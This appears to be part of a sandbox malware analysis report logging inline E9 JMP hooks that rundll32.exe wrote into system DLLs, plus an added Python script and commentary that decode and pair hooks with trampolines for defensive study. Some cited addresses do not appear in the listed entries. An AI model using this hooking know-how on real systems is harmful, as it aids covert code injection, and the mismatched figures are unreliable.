    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 77398E90 value: E9 80 71 84 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C00005 value: E9 8B 4D D3 75 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 76934D90 value: E9 7A B2 2C 8A Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C10005 value: E9 EB EB D3 75 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 7694EBF0 value: E9 1A 14 2C 8A Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C20005 value: E9 8B 8A D0 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 75928A90 value: E9 7A 75 2F 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C30005 value: E9 2B 02 D2 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 75950230 value: E9 DA FD 2D 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 82A0005 value: E9 8B 2F 0E 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 77382F90 value: E9 7A D0 F1 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83B0005 value: E9 2B BA F9 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 7734BA30 value: E9 DA 45 06 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83C0008 value: E9 8B 8E FD 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 77398E90 value: E9 80 71 02 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83E0005 value: E9 8B 4D 55 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 76934D90 value: E9 7A B2 AA 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83F0005 value: E9 EB EB 55 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 7694EBF0 value: E9 1A 14 AA 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 8400005 value: E9 8B 8A 52 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 75928A90 value: E9 7A 75 AD 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 8410005 value: E9 2B 02 54 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 75950230 value: E9 DA FD AB 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 2DF0005 value: E9 8B 2F 59 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 77382F90 value: E9 7A D0 A6 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7FE0005 value: E9 2B BA 36 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7734BA30 value: E9 DA 45 C9 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7FF0008 value: E9 8B 8E 3A 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 77398E90 value: E9 80 71 C5 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8010005 value: E9 8B 4D 92 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 76934D90 value: E9 7A B2 6D 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8020005 value: E9 EB EB 92 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7694EBF0 value: E9 1A 14 6D 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8140005 value: E9 8B 8A 7E 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 75928A90 value: E9 7A 75 81 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8150005 value: E9 2B 02 80 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 75950230 value: E9 DA FD 7F 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 2DD0005 value: E9 8B 2F 5B 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 77382F90 value: E9 7A D0 A4 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 2DE0005 value: E9 2B BA 56 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 7734BA30 value: E9 DA 45 A9 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3040008 value: E9 8B 8E 35 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 77398E90 value: E9 80 71 CA 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3060005 value: E9 8B 4D 8D 73 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 76934D90 value: E9 7A B2 72 8C Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3070005 value: E9 EB EB 8D 73 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 7694EBF0 value: E9 1A 14 72 8C Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3080005 value: E9 8B 8A 8A 72 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 75928A90 value: E9 7A 75 75 8D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3090005 value: E9 2B 02 8C 72 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 75950230 value: E9 DA FD 73 8D Jump to behavior
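    The writes above come in pairs: an E9 JMP placed at a high address in the 0x75000000-0x77FFFFFF range, and a second E9 JMP placed in a freshly allocated low page (0x8180005, 0x2DF0005, ...). Decoding the rel32 operands shows the relationship. The added script below is not part of the Joe Sandbox report; it parses the PID 2168 entries copied from the list above, resolves each JMP target (target = address after the 5-byte instruction + signed rel32, wrapped to 32 bits because rundll32.exe here is a WOW64 process) and pairs every hook with the trampoline stub that jumps back into the hooked function just past the overwritten bytes. The assumption that 0x70000000-0x7FFFFFFF holds the WOW64 system DLLs, the 16-byte upper bound on relocated prologue bytes, and the rule that the trampoline stub lives in the same page as the detour target are heuristics chosen for this example, not facts stated by the report.

```python
"""Decode E9 rel32 writes from a sandbox 'Memory written' list and pair inline hooks
with their trampolines. Added example; not code from the Joe Sandbox report."""
import re
from collections import defaultdict
from typing import List, NamedTuple, Optional

# Report entries for PID 2168, copied from the 'Memory written' list above.
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 2DF0005 value: E9 8B 2F 59 74",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 77382F90 value: E9 7A D0 A6 8B",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 7FE0005 value: E9 2B BA 36 6F",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 7734BA30 value: E9 DA 45 C9 90",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 7FF0008 value: E9 8B 8E 3A 6F",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 77398E90 value: E9 80 71 C5 90",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 8010005 value: E9 8B 4D 92 6E",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 76934D90 value: E9 7A B2 6D 91",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 8020005 value: E9 EB EB 92 6E",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 7694EBF0 value: E9 1A 14 6D 91",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 8140005 value: E9 8B 8A 7E 6D",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 75928A90 value: E9 7A 75 81 92",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 8150005 value: E9 2B 02 80 6D",
    r"Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 2168 base: 75950230 value: E9 DA FD 7F 92",
]

LINE_RE = re.compile(r"PID:\s*(\d+)\s+base:\s*([0-9A-Fa-f]+)\s+value:\s*((?:[0-9A-Fa-f]{2}\s?)+)")


class Write(NamedTuple):
    pid: int
    base: int
    data: bytes


class Hook(NamedTuple):
    pid: int
    hooked: int      # system-DLL address whose first bytes were overwritten
    detour: int      # where the patched JMP sends execution
    trampoline: int  # address of the JMP that returns into the hooked function
    stolen: int      # number of original bytes the trampoline skips over


def parse_write(line: str) -> Optional[Write]:
    m = LINE_RE.search(line)
    if not m:
        return None
    return Write(int(m.group(1)), int(m.group(2), 16),
                 bytes.fromhex(m.group(3).replace(" ", "")))


def jmp_rel32_target(base: int, data: bytes) -> Optional[int]:
    """Target of a 5-byte E9 JMP: rel32 is signed and relative to the end of the
    instruction. Wrap to 32 bits because the patched process is WOW64 (32-bit)."""
    if len(data) < 5 or data[0] != 0xE9:
        return None
    rel = int.from_bytes(data[1:5], "little", signed=True)
    return (base + 5 + rel) & 0xFFFFFFFF


def in_system_dll(addr: int) -> bool:
    # Assumption for this example: WOW64 system DLLs live in 0x70000000-0x7FFFFFFF.
    return 0x70000000 <= addr < 0x80000000


def pair_hooks(lines: List[str], max_stolen: int = 16) -> List[Hook]:
    """For each JMP written into a system DLL that leaves the DLL range, find the JMP
    in the detour's page that lands 5..max_stolen bytes into the hooked function."""
    by_pid = defaultdict(list)
    for w in filter(None, map(parse_write, lines)):
        by_pid[w.pid].append(w)
    hooks: List[Hook] = []
    for pid, writes in sorted(by_pid.items()):
        targets = {w.base: jmp_rel32_target(w.base, w.data) for w in writes}
        for hooked, detour in targets.items():
            if detour is None or not in_system_dll(hooked) or in_system_dll(detour):
                continue
            for tramp, back in targets.items():
                if back is None or (tramp >> 12) != (detour >> 12):
                    continue  # assumption: trampoline stub shares the detour's page
                stolen = back - hooked
                if 5 <= stolen <= max_stolen:
                    hooks.append(Hook(pid, hooked, detour, tramp, stolen))
                    break
    return hooks


if __name__ == "__main__":
    for h in pair_hooks(REPORT_LINES):
        print(f"PID {h.pid}: hook {h.hooked:08X} -> {h.detour:08X}; "
              f"trampoline {h.trampoline:08X} returns to {h.hooked + h.stolen:08X} "
              f"({h.stolen} bytes stolen)")
```

    For PID 2168 this yields seven hooks. Six trampolines return to hooked + 5 (exactly the length of the E9 patch), while the stub at 0x7FF0008 returns to 0x77398E98, i.e. 8 bytes were relocated because the instruction boundary at 0x77398E90 did not fall at +5; the same +8 stub shows up at 0x81C0008, 0xBE0008, 0x83C0008 and 0x3040008 in the other PIDs. Every detour target lands in the page that holds its trampoline, which is the usual layout of a detour library: relocated prologue, JMP back, hook code in one allocation. This is the observation behind the "Overwrites code with unconditional jumps" signature listed in the report.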
    Source: C:\Windows\System32\loaddll32.exe, Process information set (SetErrorMode flags): FAILCRITICALERRORS | NOOPENFILEERRORBOX (4 calls)
    Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX (48 calls), FAILCRITICALERRORS | NOOPENFILEERRORBOX (21 calls)
    Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX (102 calls), FAILCRITICALERRORS | NOGPFAULTERRORBOX (10 calls)
    Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX (37 calls), FAILCRITICALERRORS | NOOPENFILEERRORBOX (21 calls)
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
